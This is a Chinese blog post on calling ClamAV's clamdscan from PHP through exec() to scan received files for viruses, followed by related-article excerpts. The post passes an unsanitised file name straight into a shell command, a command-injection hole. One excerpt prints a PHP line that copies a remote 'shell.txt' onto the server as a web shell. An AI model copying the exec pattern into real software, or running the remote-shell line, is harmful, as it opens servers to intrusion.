[PHP] 检测文件是否有病毒的实现逻辑

最新推荐文章于 2021-12-10 19:57:56 发布
最新推荐文章于 2021-12-10 19:57:56 发布
阅读量199 收藏 1
点赞数
分类专栏: 技术
原文链接:https://www.colorgg.com
版权

在用户收到发送过来的文件后 , 要能够检测出这个文件是否是病毒 , 核心的软件是clamav , 可以在linux命令行执行,检测文件或目录里的病毒

下载和安装可以参考其他博文

需要注意的是要开启下配置文件中的

LocalSocket /tmp/clamd.socket

 

运行时是以守护进程的方式运行着一个clamd的程序 , 检测的时候只需要调用下面命令

/usr/local/clamav-0.102.1/bin/clamdscan  文件

响应的信息是下面的内容

/usr/local/clamav-0.102.1/bin/clamdscan /tmp/attachment_04613DE5A94DD00E1F48F7A5D39A802C9700000000000001_4
/tmp/attachment_04613DE5A94DD00E1F48F7A5D39A802C9700000000000001_4: Xls.Virus.Mailcab-6702020-0 FOUND

----------- SCAN SUMMARY -----------
Infected files: 1
Time: 0.176 sec (0 m 0 s)

 

在PHP中调用exec函数 , 调用上面的命令就可以实现检测了

    $cmd="/usr/local/clamav-0.102.1/bin/clamdscan {$file}";
    exec($cmd,$output);

 

zhoumouren88
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一淘模板分析PHP内存木马病毒原理
qq_29701691的博客
10-18 1593
网络安全行业,有着很强的木桶效应。系统对抗黑帽,胜负取决于安全最薄弱的环节。黑帽对抗白帽,胜负取决于攻击水平和和毁尸灭迹隐蔽的水平。内存木马,就是在内存中运行的木马病毒,没有代码实体。内存木马有着强隐蔽性,排查困难,杀不死(俗称不死马)的特点。一旦病毒样本运行起来,就会删除掉自身,并长期运行在内存当中。以上关键敏感代码都做了编码,用于避开各种安全扫描的免杀。就算被释放的木马被识破后删除,还会产生同样的文件。干掉进程后,删除释放的木马文件
PHP检测上传图片是否有木马
曹品东
10-22 1185
header("Content-type: text/html; charset=utf-8"); function checkHex($img) { $status = 0; $tips = array( "0" => "文件没问题", "5" => "文件有毒", "-1" => "文件没有上传" ); ...
后缀php有毒吗,新病毒PHP.Alf可感染PHP网页文件
weixin_33603377的博客
03-18 1114
病毒PHP.Alf可感染PHP网页文件作者:CNETNews.com.cn2008-02-03 13:16:34名称:PHP.Alf病毒类型:蠕虫感染长度:846字节危害级别:低传播速度:慢技术特征:这是一个非常简单的病毒,专门感染后缀为.php、.htm及html的文件病毒运行后,首先将自己改名为Script.php,为完成这一功能,它通过如下步骤进行:1、将自己更名为Dir.php;2、创...
PHP病毒扫描工具
06-30
最新D—盾web查杀工具,可扫描最新一句话病毒。可扫描图片、脚本及代码。支持恶意代码隔离与恢复。
【安全攻略】Thinkphp5.0检测上传的文件是否包含木马
美奇软件开发工作室
12-10 4231
一、要做测试,那么肯定是要准备一张带木马的图片文件,制作木马图片的方法: 1、创建一个名为test.php文件,代码: <?php copy("http://www.zy13.net/shell.txt","robots.php"); ?> test.php里的代码说明: copy(要复制的文件,复制文件的目的地); http://php.123.com/shell.txthttp://www.zy13.net/shell.txt是远程服务器里的一个txt文件,里面.
一个php文件上传处理类库.zip
07-11
这可以防止恶意用户上传大文件或者不安全的文件类型,如脚本或病毒。 2. **错误处理**:它内置了错误检测机制,当文件上传过程中出现任何问题时,类库能够捕获并返回相应的错误信息,便于开发者调试和处理。 3. **...
PHP论文格式化系统——前台的设计与实现(源代码+论文).rar
最新发布
01-22
开发者需要确保用户上传的文件安全无病毒,防止恶意文件上传。这可能通过文件类型检查、文件大小限制以及使用安全的文件上传机制(如临时文件文件重命名)来实现。 此外,系统的可扩展性和维护性也是设计时需要...
c# 可疑文件扫描代码(找到木马)(简)
09-05
- 使用 `StreamReader` 类读取文件内容,进行木马检测(代码中未提供具体的木马检测逻辑,这部分通常涉及复杂的正则表达式或与其他反病毒库集成)。 7. **UI更新(UI Updating)**: - UI更新是线程安全的,通过委托...
基于PHP的仿系统之家下载程序.zip
07-25
6. **安全检查**:为了保障用户安全,可能内置了简单的安全检查机制,对上传的软件进行病毒扫描或恶意代码检测。 7. **用户反馈**:用户可以对下载的软件进行评分和评论,提供其他用户参考。 8. **多语言支持**:...
基于PHP的腾讯QQ域名防报毒工具源码 PHP版.zip
08-28
该资源是一个基于PHP编程语言开发的腾讯QQ域名防报毒工具的源代码包。这个工具的主要目的是保护...这个源码包可能包含了实现上述功能的PHP文件,开发者可以通过学习和分析这些代码,提升对PHP和Web安全工具开发的理解。
如何分辨php文件有没有木马,扫描目录下的php文件,是不是含有木马特征
weixin_31234809的博客
03-17 476
扫描目录下的php文件是否含有木马特征shell_checkl#!/usr/bin/python#-*- encoding:UTF-8 -*-##### @package## @desc 扫描目录下的php文件是否含有木马特征,注意,不是“木马扫描”## @useage python shell_check.py /your/web/path/ 1=是否递归###import osimport...
php文件病毒吗,关于检测文件是否病毒PHP实现逻辑
weixin_39683163的博客
03-24 194
在用户收到发送过来的文件后 , 要能够检测出这个文件是否病毒 , 核心的软件是clamav , 可以在linux命令行执行,检测文件或目录里的病毒推荐:PHP视频教程下载和安装可以参考其他技术文章。需要注意的是要开启下配置文件中的LocalSocket /tmp/clamd.socket运行时是以守护进程的方式运行着一个clamd的程序 , 检测的时候只需要调用下面命令/usr/local/cl...
php病毒源代码,病毒程序源码实例剖析-CIH病毒[2]
weixin_33335851的博客
03-19 1066
病毒程序源码实例剖析-CIH病毒[2]OriginalAppEXE SEGMENT;PE格式可执行文件文件头FileHeader:db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000hdb 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000hdb 0b8h, 000h, 000h, 000h, 000h, 000h...
扫描目录下的php文件是否含有木马特征
NiceGY
04-11 3253
扫描目录下的php文件是否含有木马特征
Win 2003安全检测 让入侵者无处遁形
weixin_30505225的博客
10-23 118
Win 2003安全检测 让入侵者无处遁形 http://blog.163.com/myp8109/blog/static/1947228200871375615305/ Windows Server 2003是服务器版的系统,个人用户时有使用,但其多被用来做服务器的系统平台。攻击者更愿意获取其控制权,因此它面临的安全威胁也最大。往往的情况是,我们的系统遭到攻击甚至被入侵而...
发现了第一只php病毒PHP.Pirus
terrywang的专栏
12-21 859
发现了第一只php病毒PHP.Pirus 来源:http://www.sarc.com/avcenter/venc/data/php.pirus.html 发现时间:2000-9-11 最后更新时间: 2000-11-13下午0 4:02:47 (太平洋标准时间) PHP.Pirus是第一只被发现的用PHP写的病毒,它寻找扩展名为.php和.htm的文件,并插入代码去调用自己。这个病毒
PHP文件在线检测病毒,VIRSCAN 在线病毒检测客户端
weixin_36082388的博客
04-09 670
/****本程序以及提供的源码仅供技术交流使用、作者不作任何类型担保,在任何情况下都不对使用本软件造成的任何损失或任何相应而生、间接、附带的损失承担任何责任.****/importwin.ui;importinet.url;importweb.form;importweb.uploadData;importstring.crypt;importinet;/*DSG{{*/varwinform = ...
PHP文件在线检测病毒,关于检测文件是否病毒PHP实现逻辑
weixin_36400833的博客
04-09 333
在用户收到发送过来的文件后 , 要能够检测出这个文件是否病毒 , 核心的软件是clamav , 可以在linux命令行执行,检测文件或目录里的病毒推荐:PHP视频教程下载和安装可以参考其他技术文章。需要注意的是要开启下配置文件中的LocalSocket /tmp/clamd.socket运行时是以守护进程的方式运行着一个clamd的程序 , 检测的时候只需要调用下面命令/usr/local/cl...
基于php校内文件共享系统设计与实现.docx
11-09
报告详细介绍了如何利用PHP技术开发一个Web应用程序,以便在校内实现文件的共享、上传和下载功能。系统主要由六个功能模块构成,包括文件查询、上传下载、文件添加、资源分类管理以及其他的管理功能。 1. 技术选型...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值